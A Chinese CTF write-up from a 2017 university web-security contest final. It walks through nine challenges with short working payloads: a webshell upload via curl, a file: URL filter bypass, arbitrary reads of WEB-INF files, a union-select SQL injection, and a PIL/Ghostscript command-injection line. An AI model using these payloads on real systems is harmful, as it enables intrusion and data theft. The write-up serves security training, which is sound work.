2017 全国大学生软件测试大赛web安全赛分区决赛 WriteUp

周末去广州水了一波，比赛的时候做出来7道题，赛后补上2、3两题，下面是前9题的WriteUp，期待大佬的第10题WriteUp

1.host

在burpsuite中修改host为www.mooctest.net

2.Babyupload

扫描得到upload.php，本地构造upload.html

<html>
<head>
<meta charset="utf-8">
</head>
<body>

<form action="http://114.55.36.69:46012/upload.php" method="post" enctype="multipart/form-data">
    <label for="upfile">文件名：</label>
    <input type="file" name="upfile" id="file"><br>
    <input type="submit" name="submit" value="提交">
</form>
</body>
</html>

比赛的时候死活猜不出文件参数名，file、upload、uploadfile都试过，赛后经大佬提醒才知道是upfile
也可以直接用curl上传文件，学到了

curl http://114.55.36.69:46012/upload.php -F "upfile=@x.php"

上传后菜刀连接，查看web目录下的flag.php拿到flag

3.curl

过滤了file:后面的/，把/转成0x2f

http://114.55.36.69:46013/index.php?url=file:0x2f0x2f/var/www/html/index.php

4.war

根据题目提示，下载trick-or-treat.war

5.readme2

在js文件里发现

http://114.55.36.69:46015/test/show.do?page=help.jsp

猜测是任意文件读取，读取javaweb工程的WEB-INF/web.xml文件

接着读取WEB-INF/properties/configInfo.properties

发现key.jsp，读取key.jsp

6.source ip

去fofa搜标题，试了三四个就试出来了，听说还有发邮件姿势更优雅

7.hackedsite

扫描得到

http://118.178.18.181:46017/upload/phpspy.php

百度搜索phpspy得到密码angle，连接大马拿到flag

8.babysql3

name字段存在注入，构造

keyname=1&name=name` union select 1,2,flag from flag %23

9.snake

提示了PIL-RCE
参考https://github.com/neargle/PIL-RCE-By-GhostButt/blob/master/Exploiting-Python-PIL-Module-Command-Execution-Vulnerability.md
构造poc文件中的代码为

(%pipe%cat /var/www/Flask/flag > tmp/fffffff.png)

上传得到flag

10.thinkphp5

无

赏

谢谢你请我吃糖果

支付宝

微信